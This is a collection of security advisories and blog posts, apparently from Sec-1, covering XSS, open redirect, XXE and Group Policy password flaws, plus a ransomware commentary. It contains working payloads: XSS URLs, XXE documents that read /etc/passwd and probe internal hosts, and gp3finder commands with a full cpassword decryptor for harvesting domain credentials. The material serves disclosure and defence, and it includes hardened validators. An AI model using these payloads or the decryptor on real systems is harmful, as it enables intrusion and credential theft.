Sec-1 Advisory: Reflected Cross-Site Scripting and Open Redirect in WatchGuard Fireware v11.11

Sec-1 Security Advisory
Severity : Medium
Advisory Name : Reflected Cross-Site Scripting and Open Redirect in WatchGuard Fireware v11.11
Discovery Date : 27/04/2016
Release Date : 11/07/2016
Application : WatchGuard Fireware version 11.11 and earlier
Platform : Windows
CVE : CVE-2016-6154
Discovered by : Ryan Ward
Vendor Status : Resolved in v11.11.1 Fireware Update available from: https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_11_1/index.html#Fireware/en-US/EN_Release_Notes_Fireware.html
Website : http://www.sec-1.com/blog
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6154
http://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_11_1/Fireware_Release-Notes_v11_11_1.pdf

Vulnerability Summary

Reflected Cross-Site-Scripting (Reflected XSS) and Open Redirection

Cross-Site Scripting (XSS) is a vulnerability that occurs when user-supplied data is accepted by the server and returned in a response without proper encoding or sanitisation, which allows an attacker to embed a malicious script in a request that is later served to another user. Reflected XSS occurs when the malicious data is immediately returned in the response to the malicious request, whereas Stored XSS occurs when the malicious data is held by the application for some time before being embedded in a response (for example, stored in a database and retrieved at a later date).

Open redirection vulnerabilities occur when an application incorporates user controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users.

Exploit

A single parameter on the SSL-VPN authentication applet of WatchGuard firewalls running Fireware < v11.11.1 was found to be vulnerable to both Reflected Cross-Site Scripting (XSS) and Open Redirection. This would allow an attacker to launch XSS attacks against targeted users by sending them crafted links (for example, a malicious link in a targeted email). The effects could, for example, include:

  • Stealing access credentials from a targeted user as that user logs in
  • Stealing an access token from a targeted user as that user logs in
  • Displaying a malicious or political message to the user (virtual defacement)

Example Payload/POC
The vulnerability can be reproduced by browsing to "success.html?redirect=javascript:alert(document.domain)" on the SSL-VPN port (4100 by default) of any affected WatchGuard firewall:

https://Firewall_IP:4100/success.html?redirect=javascript:alert("Sec-1")

The same parameter is also vulnerable to open redirection: https://Firewall_IP:4100/success.html?redirect=http://www.sec-1.com redirects the user's browser to the Sec-1 homepage.
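Both issues above come from the same root cause: the value of the "redirect" parameter is handed to the browser unchanged, so it may carry a scheme ("javascript:", "http://") that the application never intended. The following is an added example, not WatchGuard's code and not part of the original advisory; the function names, the "redirect" query handling and the fallback path "/" are this example's own assumptions. It shows the unsafe pattern next to a validator that accepts only a path on the same site, and it rejects a few look-alikes a plain "starts with /" check misses. The rules are the same whichever side (server or client-side script) performs the redirect.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allowed characters for a same-site target: RFC 3986 path/query characters
# only. No backslash (browsers treat '\' as '/' in http(s) URLs, so
# '/\evil.example' is parsed as '//evil.example' even though urlsplit()
# reports it as a plain path), no whitespace or control characters, no '#<>"'.
SAFE_TARGET = re.compile(r"/[A-Za-z0-9._~%!$&'()*+,;=:@/?-]*")


def unsafe_redirect_target(query: str, fallback: str = "/") -> str:
    """The vulnerable behaviour: return ?redirect= exactly as supplied.

    'javascript:alert(1)' becomes a script URL (reflected XSS) and
    'http://attacker.example' an off-site redirect (open redirection).
    """
    values = parse_qs(query, keep_blank_values=True).get("redirect")
    return values[0] if values else fallback


def safe_redirect_target(query: str, fallback: str = "/") -> str:
    """Return ?redirect= only if it is a same-site, path-relative target."""
    values = parse_qs(query, keep_blank_values=True).get("redirect")
    if not values or not values[0]:
        return fallback
    target = values[0]

    # 1. Character allow-list (see SAFE_TARGET): kills schemes with odd
    #    characters, backslashes, tabs/newlines and fragment tricks.
    if not SAFE_TARGET.fullmatch(target):
        return fallback

    # 2. Exactly one leading slash: '//host' and '///host' are network-path
    #    references and take the browser off the site.
    if target.startswith("//"):
        return fallback

    # 3. The URL parser must agree there is no scheme and no authority.
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return fallback

    return target


if __name__ == "__main__":
    # Constructed inputs, including the two payloads from this advisory.
    for q in ("redirect=javascript:alert(1)", "redirect=http://www.sec-1.com",
              "redirect=//evil.example/", "redirect=%2F%5Cevil.example",
              "redirect=/portal/home?tab=1"):
        print(f"{q:40} unsafe={unsafe_redirect_target(q)!r:35} safe={safe_redirect_target(q)!r}")
```

Note that the allow-list rejects before the parser runs: Python's urlsplit() and a browser's URL parser disagree on inputs such as backslashes and leading whitespace, and a redirect check that trusts only the server-side parser inherits those differences.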

Vendor Response


As of Fireware 11.11.1 this vulnerability has been reported as being fixed by WatchGuard. Sec-1 would like to thank WatchGuard for their prompt and professional response.


Sec-1 Advisory: Reflected Cross-Site-Scripting in Blackberry BES12 version 12.4

Sec-1 Security Advisory
Severity : Medium
Advisory Name : Reflected Cross-Site-Scripting in Blackberry BES12 version 12.4
Discovery Date : 23/02/2016
Release Date : 12/04/2016
Application : BES12 version 12.4 and earlier
Platform : Windows
CVE : CVE-2016-1917, CVE-2016-1918
Discovered by : Nicodemo Gawronski
Vendor Status : Resolved in April 2016 Blackberry Update available from http://web.blackberry.com/support/business/bes-support/bes-support-downloads.html
Website : http://www.sec-1.com/blog
http://support.blackberry.com/kb/articleDetail?articleNumber=000038118
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1917
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1918

Vulnerability Summary

Reflected Cross-Site-Scripting (Reflected XSS)

Two instances of Reflected Cross-Site-Scripting were discovered on the affected software.
Cross-Site-Scripting (XSS) is a vulnerability that occurs when user entered data is accepted by the server and returned in a response to the user without proper sanitisation, which allows an attacker to embed malicious scripts within a request which is later served to another user. Reflected XSS occurs when the malicious data is immediately returned in a response to a malicious request, whereas Stored XSS occurs when the malicious data is held by the application for some time before being embedded in a response (such as being stored in a database and then retrieved at a later date).

Exploit

Two parameters, on the "admin/settings/redirect.do" and "admin/user/userDetails.do" pages of the BES12 web server, were found to be vulnerable to Reflected Cross-Site Scripting (XSS).
This would allow an attacker to launch XSS attacks against targeted users by sending them crafted links (for example, a malicious link in a targeted email). The effects could, for example, include:

  • Stealing access credentials from a targeted user as that user logs in
  • Stealing an access token from a targeted user as that user logs in
  • Displaying a malicious or political message to the user

Example Payload/POC

Steps to reproduce the vulnerability:

  1. Log in to the BES12 Server.
  2. Access the following URLs:
https://BES12_Server_IP/admin/settings/redirect.do?settingUrl=%22-alert%28document.domain%29-%22

Reflected XSS in "/admin/settings/redirect.do"

https://BES12_Server_IP/admin/user/userDetails.do?userId=3&backLocation=usergrid");alert(1);//&suppressLoginWizard=true&gridHandleId=50896ee8-f282-4713-b54d-33f7725099fb

Reflected XSS in "/admin/user/userDetails.do"

This is a simplistic payload that merely displays a pop-up message demonstrating that the page is vulnerable; a more advanced payload could easily be crafted to perform the actions discussed above.
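Both payloads above open with a double quote and then close it, which is the signature of a parameter echoed inside a quoted JavaScript string (the second one, usergrid");alert(1);//, closes the string and the call it sits in, then comments out the rest of the line). The following is an added example, not BlackBerry's code and not part of the original advisory: it models that context with a raw-concatenation template, then an encoder that keeps any value inside the literal. It is written in Python for illustration; the variable name backLocation is taken from the URL above, while the function names and the template text are this example's own assumptions.

```python
import json


def vulnerable_script(back_location: str) -> str:
    """The pattern the payload breaks out of: the parameter is concatenated
    straight into a <script> block, so a quote in the value ends the literal."""
    return 'var backLocation = "' + back_location + '";'


def js_string_literal(value: str) -> str:
    """Encode value as a JavaScript string literal that is safe inside <script>.

    json.dumps() escapes the quote and backslash that would end the literal
    and, with ensure_ascii (the default), turns every non-ASCII character
    including the JS line terminators U+2028/U+2029 into \\uXXXX escapes.
    The extra replacements stop the HTML parser, which runs before the JS
    parser, from seeing '</script>' or '<!--' inside the literal; \\u003c is
    still a plain '<' once JavaScript decodes the string.
    """
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def safe_script(back_location: str) -> str:
    """Same template, but the value is emitted through js_string_literal()."""
    return "var backLocation = " + js_string_literal(back_location) + ";"


if __name__ == "__main__":
    # Constructed inputs: the advisory's payload and a closing-tag variant.
    for value in ('usergrid");alert(1);//', '</script><script>alert(1)</script>'):
        print("vulnerable:", vulnerable_script(value))
        print("safe:      ", safe_script(value))
```

The encoder is context-specific: it is correct only for a value placed where a JavaScript string literal is expected. The same value landing in an HTML attribute, an HTML text node or a URL needs that context's encoding instead, and the usual mistake is to apply one encoder everywhere.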

Vendor Response

The vendor has patched the XSS issues in the April 2016 Software Update. Sec-1 would like to thank Blackberry for their prompt and professional response.


Critical: Remote Command Execution in WordPress Form Manager Plugin (CVE-2015-7806)

Sec-1 Security Advisory
Advisory Name : Critical: Remote Command Execution in WordPress Form Manager Plugin
Discovery Date : 09/10/2015
Release Date : 12/10/2015
Application : Form Manager plugin for WordPress
Platform : WordPress
Severity : High (arbitrary code execution)
CVE : CVE-2015-7806
Discovered by : Nick Blundel
Vendor Status : Resolved on 12th October via an update to the plugin version 1.7.3
Website : https://wordpress.org/plugins/wordpress-form-manager/

Vulnerability Summary


On the 9th October 2015 researchers at Sec-1 (AppCheck NG Team) discovered a critical Remote Command Execution (RCE) in the popular WordPress plugin Form Manager which allows an attacker with an unprivileged account (including a self-registered account) to execute arbitrary commands on the host. The vulnerability was reported and fixed on the 12th October.

Demonstration Video


See details and a demonstration of the vulnerability here.

Solution


The vulnerability has now been resolved by the developer: please upgrade the plugin to version 1.7.3 or later.

Exploit

Here is an example exploit script for this vulnerability: wp-forms-manager-CVE-2015-7806.py


Sec-1 Advisory: BroadSoft BroadWorks XSP XML External Entity Injection

Sec-1 Security Advisory
Advisory Name : XML External Entity Injection in BroadWorks XSP XML Interface
Discovery Date : 23/03/2015
Release Date : 02/06/2015
Application : BroadWorks XSP XML Interface 17.0 (XML interface on TCP/8011)
Platform : Linux
Severity : High (arbitrary file retrieval)
CVE : CVE-2015-4120
Discovered by : Jordan Carter, Holly Williams
Vendor Status : Resolved in May 2015 BroadWorks Update available from http://xchange.broadsoft.com/
Website : http://www.sec-1.com/blog
http://www.broadsoft.com/service-providers/products-applications/broadworks/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-4120

Vulnerability Summary

XML External Entity Injection

An XML external entity injection vulnerability was identified that allows an unauthenticated attacker to read arbitrary files from the server and enumerate internal web applications.
Applications that parse XML input may be vulnerable to attacks involving XML External Entities. Many parsers resolve external entities by default unless the developer takes deliberate steps to disable them.
If a parser allows external entities to be defined and then referenced by an attacker, the attacker may be able to read arbitrary files, load content from applications that are only intended to be accessed internally, and potentially perform a denial of service against the application server. In rare cases XXE can lead to remote command execution.

Exploit

When a specially crafted payload is supplied to the affected application listening on port TCP/8011 the server parses the supplied content as valid XML. This can be leveraged to read arbitrary server side files and communicate with internal network components.

Example Payload

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert[ <!ENTITY c SYSTEM "file:///etc/passwd">]><xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0"><requestId>&c;</requestId><period>30</period></xsp:keepalive>


The above payload can be transmitted with freely available tools such as telnet, and will result in a vulnerable server responding with the contents of the local /etc/passwd file. An attacker able to enumerate the location of sensitive files, such as configuration files, could gain unauthorised access to data such as system credentials. Additionally, internal systems that are not normally reachable by the attacker could be targeted with payloads such as:


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert[ <!ENTITY c SYSTEM "http://10.50.1.1:80/">]><xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0"><requestId>&c;</requestId><period>30</period></xsp:keepalive>


This will request the content from a web server residing at 10.50.1.1 on port 80. A payload such as this could allow an attacker to enumerate internal web applications, potentially gain access to confidential data and conduct attacks on internal systems (such as error-based SQL injection), potentially leading to further network compromise.
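What makes the two payloads above work is visible at the parser level: the internal DTD subset declares an entity whose replacement text lives at a SYSTEM identifier, and the reference &c; in requestId asks the parser to fetch it. The following is an added example, not BroadSoft's code and not part of the original advisory. It rebuilds the advisory's keepalive payloads from a template (the xsp namespace, element names and version are those shown above), then uses Python's expat bindings to show, offline, which external resource a permissive parser is asked to fetch, and a hardened parse that refuses any document carrying a DOCTYPE before a single entity can be declared. The function names, and the send_raw helper that stands in for the telnet step, are this example's own assumptions.

```python
import socket
from xml.parsers import expat

PROLOG = '<?xml version="1.0" encoding="UTF-8"?>'
KEEPALIVE = ('<xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" '
             'version="17.0"><requestId>{request_id}</requestId>'
             '<period>30</period></xsp:keepalive>')


def keepalive_request(request_id_xml: str, doctype: str = "") -> bytes:
    """A keepalive document; request_id_xml is inserted as raw XML."""
    return (PROLOG + doctype + KEEPALIVE.format(request_id=request_id_xml)).encode()


def xxe_payload(system_id: str) -> bytes:
    """The advisory's payload shape with an arbitrary SYSTEM identifier
    (file:///..., http://internal-host/...)."""
    doctype = f'<!DOCTYPE convert[ <!ENTITY c SYSTEM "{system_id}">]>'
    return keepalive_request("&c;", doctype)


def external_entity_requests(document: bytes) -> list:
    """Parse like a permissive parser and record every external entity the
    parser asks for when expanding content, without actually fetching it."""
    requested = []
    parser = expat.ParserCreate()

    def on_external_ref(context, base, system_id, public_id):
        requested.append(system_id)
        return 1  # tell expat the fetch "succeeded" (as empty) and continue

    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(document, True)
    return requested


def parse_keepalive_strict(document: bytes) -> dict:
    """Hardened parse: abort on any DOCTYPE, so no entity (internal or
    external) can ever be declared; otherwise return element text by name."""
    fields, stack = {}, []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE is not permitted in XSP requests")

    def on_start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")

    def on_text(data):
        fields[stack[-1]] += data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = on_text
    parser.Parse(document, True)
    return {name: text for name, text in fields.items() if text}


def send_raw(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Deliver a document to the XML interface and return the reply (the
    advisory does this step with telnet). Not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        chunks = []
        try:
            while (data := sock.recv(4096)):
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    for target in ("file:///etc/passwd", "http://10.50.1.1:80/"):
        print(target, "->", external_entity_requests(xxe_payload(target)))
    print(parse_keepalive_strict(keepalive_request("abc123")))
```

Refusing the DOCTYPE outright is the simplest fix for an interface whose schema never needs one; where a DTD is required, the parser must be configured so that external general and parameter entities are not resolved, and that setting must be verified against the parser actually in use, since defaults differ between libraries and versions.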

Vendor Response


The vendor has patched the XXE Injection issues in the May 2015 BroadWorks update. Sec-1 would like to thank BroadSoft for their prompt and professional response.

Additional CVE Details


The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2015-4120 : Assigned to the XML External Entity (XXE) discovery. Assigned Bug ID# TAC-129144 by BroadSoft.
Copyright 2015 Sec-1 LTD. All rights reserved.


Novel malvertising attack leads to drive by ransomware

Today Threatpost (Kaspersky's news site) published an article, https://threatpost.com/malvertising-leads-to-magnitude-exploit-kit-ransomware-infection/112894, regarding the evolving malvertising and ransomware threat.

It can be incredibly disruptive, costly and in some cases devastating in its consequences, so we at Sec-1 Ltd have taken a look at what it means in terms of:

  • is there anything about this news that is surprising, unique or novel?
  • what is the real threat from this?
  • how should users and organisations respond?

Taking a look at the Threatpost article, we didn't find this surprising at all; it is reminiscent of another article (http://www.informationweek.com/partner-perspectives/bitdefender/malvertising-5-lessons-for-companies-and-employees/a/d-id/1318190) posted in 2014 referencing attacks from 2012.

Exploitation toolkits give attackers an easy method of deploying malicious payloads to victims, allowing a large degree of control over their machines. Couple that with the fact that ransomware has proven profitable for criminals, and that malvertising is an effective method of hitting a large and varied number of potential victims, and it is unsurprising that attackers continue to use these tactics. Given its profitability, ransomware has evolved, as malware has for the past two decades, into 'toolkits'. These toolkits chain exploitation and evasion tactics to get around traditional security defences such as anti-virus and firewalls. The usual tactics of 'script src=' or hidden iframes are well-known techniques for issuing a browser redirection in malvertising; the '302 cushioning' described in the article (essentially 302 redirects delivered through iframes) is a new technique, and when coupled with domain shadowing, also used by this toolkit, it can lead to an effective compromise of a target.

The real threat here to end users is the impact of the ransomware payload. Regardless of how it is delivered, users hit with ransomware risk losing all of their data: the family photos stored on your laptop, or the assignment you are working on for university. Which files each user considers critical differs greatly, but everyone has something on their machine that would be a terrible loss if they could no longer access it. That is what ransomware does: it encrypts your files and denies you access to them until you pay the ransom.

Generally speaking, exploitation toolkits do not deploy zero-day exploits but use well-known ones, in this case an exploit from 2013. This means that not all hope is lost for end users: there are steps, backed by the tried and tested 'defence in depth' principle, they can take to ensure they are protected:

Patch as soon as you can!

Configure your computer to automatically install updates for both your web browser and your operating system. The challenge is not to wait until day 30 of the 'accepted' window for applying patches but to apply them as close to the release day as possible. In this example the ransomware campaign was running well before the patches are commonly applied, so the threat is immediate, especially given our natural inclination to click on a link in an email or other communication without having checked the link's validity.

Back-ups and Separation of Storage

Backup important data on external hard disks that are not usually connected to your machine. If the disk isn’t connected then the malware can’t encrypt it and deny access! Backup regularly.

Update your antivirus, regularly!

The URL in the email won't be the only route to what you want if it's legitimate

Employ good practices when receiving email: if it is asking you to 'click', think twice before you do. In the corporate world there are many more ways to apply controls, such as digital signing of emails and broad, regular awareness training programmes that build the habit of not clicking on malware links and help enforce corporate policy. Given the rise in Advanced Persistent Threats, this clearly has benefits wider than just preventing sensitive data from being held to ransom.

Stop and think before you Click

The reality is that phishing emails and malvertising exploit our trust in brands so that we just click, walking straight into these types of attack. There is a simple way of avoiding them: use the more formal way of arriving at the same information. If you like what the malvertisement is offering, use a search engine to find the destination rather than clicking the advert. Likewise with email: if Amazon or eBay are emailing you, there will be a copy of the message in the message centre within their application. Rather than follow the link in the email, log in to the application and find a different route to the same information.

Other links…

SC Magazine – Novel malvertising attack leads to drive by ransomware



Tool: Group Policy Passwords Exploit Tool – gp3finder

Group Policy preferences were introduced by Microsoft in Windows Server 2008, allowing administrators to configure unmanaged settings (settings which the user can change) from a centrally managed location, Group Policy Objects (GPOs) [1].

Among the preference items configurable through Group Policy preferences are several that can contain credentials: Local Groups and User Accounts, Drive Mappings, Schedule Tasks, Services, and Data Sources.

These credentials are stored within the preference item in SYSVOL in the GPO containing that preference item. In order to obscure the password from casual users it is encrypted in the XML file of the preference item [2]. However anyone who gains access to SYSVOL can decrypt the passwords because Microsoft published the Advanced Encryption Standard (AES) encryption key [1]:

4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b

Microsoft addressed this issue in MS14-025 [4] however this update only prevented the creation of new Group Policy Preference items containing credentials; it did not remove any existing instances as this was considered too disruptive. Therefore network administrators must take action to find and remove these vulnerable items.

Several tools exist to exploit this vulnerability including:

Get-GPPPassword (PowerShell – http://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html)

gpp (Metasploit Post Module – http://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp)

gpprefdecrypt.py (Python – http://esec-pentest.sogeti.com/public/files/gpprefdecrypt.py)

gpp-decrypt-string.rb (Ruby – http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html)

However, each of these existing tools has a significant weakness. Get-GPPPassword must be run from a Windows machine; the gpp Metasploit post module requires a meterpreter session; gpprefdecrypt.py and gpp-decrypt-string.rb require you to manually extract the cpassword for decryption; and finally, the version of gpprefdecrypt.py available for download no longer works at the time of writing (due to an update to PyCrypto that removed the default Initialisation Vector (IV) of 16 zero bytes).

Sec-1 Penetration Tester Oliver Morton therefore wrote a new cross platform tool, dubbed GP3Finder (Group Policy Preference Password Finder), to automate the process of finding, extracting and decrypting passwords stored in Group Policy preference items. This tool is written in Python (2.7) and depends on PyCrypto and PyWin32 on Windows or subprocesses on *nix based operating systems.

GP3Finder has been released open source under the GPL2 license here and a compiled executable for Windows is also available here.

Update v4.0

On a recent test, Oliver had compromised a single Windows host and had remote desktop access as a low privilege user. Since he couldn’t map the C$ share remotely, and didn’t want to search through the dozens of Group Policy Preference items using built in Windows utilities, he quickly added the required functionality to gp3finder instead.

Note: Group Policy Preferences are cached locally under the (hidden) directory: “C:\ProgramData\Microsoft\Group Policy\History\” by default.

In this update the option to specify the start path when searching a remote share was added. This allows you to quickly search for Group Policy Preference passwords when you have access to the C$ share without searching the entire drive.

Another significant change is that you can now specify multiple hosts to search – ideal if you have access to C$ on a number of hosts and want to check all of them. Note, this functionality is not threaded (yet) so can take some time to complete.

Finally some of the command line options have been changed to ensure they are as intuitive as possible (see below or –help).

Example Usage

Decrypt a given cpassword:

gp3finder.py -D CPASSWORD

The following commands output decrypted cpasswords (from Groups.xml etc) and list of xml files that contain the word ‘password’ (for manual review) to a file (‘gp3finder.out’ by default, this can be changed with -o FILE).

Find and decrypt cpasswords on domain controller automatically:

gp3finder.py -A -t DOMAIN_CONTROLLER -u DOMAIN\USER
 Password: PASSWORD

Maps DOMAIN_CONTROLLER’s sysvol share with given credentials.

Find and decrypt cpasswords on the local machine automatically:

gp3finder.py -A -l

Searches through “C:\ProgramData\Microsoft\Group Policy\History” (by default) this can be changed with -lr PATH

Find and decrypt cpasswords on a remote host:

gp3finder.py -A -t HOST -u DOMAIN\USER -s C$ -rr "ProgramData\Microsoft\Group Policy\History"

Find and decrypt cpasswords on hosts specified in a file (one per line):

gp3finder.py -A -f HOST_FILE -u DOMAIN\USER -s C$ -rr "ProgramData\Microsoft\Group Policy\History"

Note: the user this script is run as must have permission to map/mount shares if running against a remote host.

Additional options are available:

gp3finder.py --help
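The following is an added example and is not gp3finder's source code. It implements the decryption the tool's -D option performs, using the published key from [1] above with the 16-zero-byte IV, AES-256-CBC, PKCS#7 padding and a UTF-16LE plaintext, and a directory walk in the spirit of the -A mode: decrypt every cpassword attribute found under a Preferences tree and list the other XML files that mention "password" for manual review. It requires either pycryptodome or cryptography for AES (the tool itself uses PyCrypto); the function names are this example's own, and the sample Preferences tree it writes to a temporary directory is constructed for the demonstration, not real SYSVOL data (the encrypt helper exists only to build that sample; nothing in Group Policy needs it).

```python
import base64
import re
import tempfile
from pathlib import Path

try:
    from Crypto.Cipher import AES  # pycryptodome

    def _aes_cbc(key: bytes, iv: bytes, data: bytes, encrypt: bool) -> bytes:
        cipher = AES.new(key, AES.MODE_CBC, iv)
        return cipher.encrypt(data) if encrypt else cipher.decrypt(data)
except ImportError:  # fall back to the cryptography package
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc(key: bytes, iv: bytes, data: bytes, encrypt: bool) -> bytes:
        cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
        op = cipher.encryptor() if encrypt else cipher.decryptor()
        return op.update(data) + op.finalize()

# The AES-256 key Microsoft published (reference [1]); the IV is all zeros.
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8"
                        "f496e806cc057990209b09a433b66c1b")
GPP_IV = bytes(16)

CPASSWORD_RE = re.compile(r'cpassword="([^"]*)"')
SAMPLE_PASSWORD = "S3cr3tL0calAdm1n!"  # constructed sample, see write_sample_tree()


def decrypt_cpassword(cpassword: str) -> str:
    """What `gp3finder.py -D CPASSWORD` computes."""
    # Preference XML stores the base64 text without '=' padding; restore it.
    padded = cpassword + "=" * (-len(cpassword) % 4)
    plain = _aes_cbc(GPP_KEY, GPP_IV, base64.b64decode(padded), encrypt=False)
    plain = plain[:-plain[-1]]            # strip PKCS#7 padding
    return plain.decode("utf-16-le")      # Windows wrote the password as UTF-16LE


def encrypt_cpassword(password: str) -> str:
    """Inverse of decrypt_cpassword(); only used here to build sample data."""
    data = password.encode("utf-16-le")
    pad = 16 - len(data) % 16
    data += bytes([pad]) * pad
    return base64.b64encode(_aes_cbc(GPP_KEY, GPP_IV, data, encrypt=True)).decode().rstrip("=")


def find_gpp_passwords(root: str):
    """Walk a SYSVOL or Group Policy History tree. Returns (decrypted, for_review):
    decrypted is a list of (xml path, plaintext); for_review lists XML files
    with no cpassword that still mention 'password' (as gp3finder reports)."""
    decrypted, for_review = [], []
    for path in Path(root).rglob("*.xml"):
        text = path.read_text(encoding="utf-8", errors="replace")
        found = CPASSWORD_RE.findall(text)
        for cpassword in found:
            decrypted.append((str(path), decrypt_cpassword(cpassword)))
        if not found and "password" in text.lower():
            for_review.append(str(path))
    return decrypted, for_review


def write_sample_tree() -> str:
    """Constructed, simplified Preferences tree (not real SYSVOL content)."""
    root = Path(tempfile.mkdtemp(prefix="gpp-sample-"))
    groups = root / "Machine" / "Preferences" / "Groups"
    groups.mkdir(parents=True)
    (groups / "Groups.xml").write_text(
        '<?xml version="1.0" encoding="utf-8"?>\n<Groups><User name="LocalAdmin">'
        f'<Properties action="U" userName="LocalAdmin" cpassword="{encrypt_cpassword(SAMPLE_PASSWORD)}"/>'
        '</User></Groups>\n', encoding="utf-8")
    tasks = root / "Machine" / "Preferences" / "ScheduledTasks"
    tasks.mkdir(parents=True)
    (tasks / "ScheduledTasks.xml").write_text(
        '<?xml version="1.0" encoding="utf-8"?>\n<ScheduledTasks><Task name="Backup">'
        '<Properties runAs="CORP\\svc_backup" logonType="Password"/></Task></ScheduledTasks>\n',
        encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    decrypted, review = find_gpp_passwords(write_sample_tree())
    for path, password in decrypted:
        print(f"{path}: {password}")
    for path in review:
        print(f"review manually: {path}")
```

Two details trip up hand-rolled decoders: the base64 text in the XML has had its "=" padding removed, so it must be restored before decoding, and the plaintext is UTF-16LE, so a password that looks like alternating characters and NUL bytes has simply not been decoded yet. Anything this walk decrypts should be treated as compromised and rotated, since the same key is available to anyone who can read SYSVOL.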

References

[1] [Online]. Available: http://www.microsoft.com/en-us/download/details.aspx?id=24449.
[2] [Online]. Available: http://blogs.technet.com/b/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx.
[3] [Online]. Available: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx.
[4] [Online]. Available: http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx.
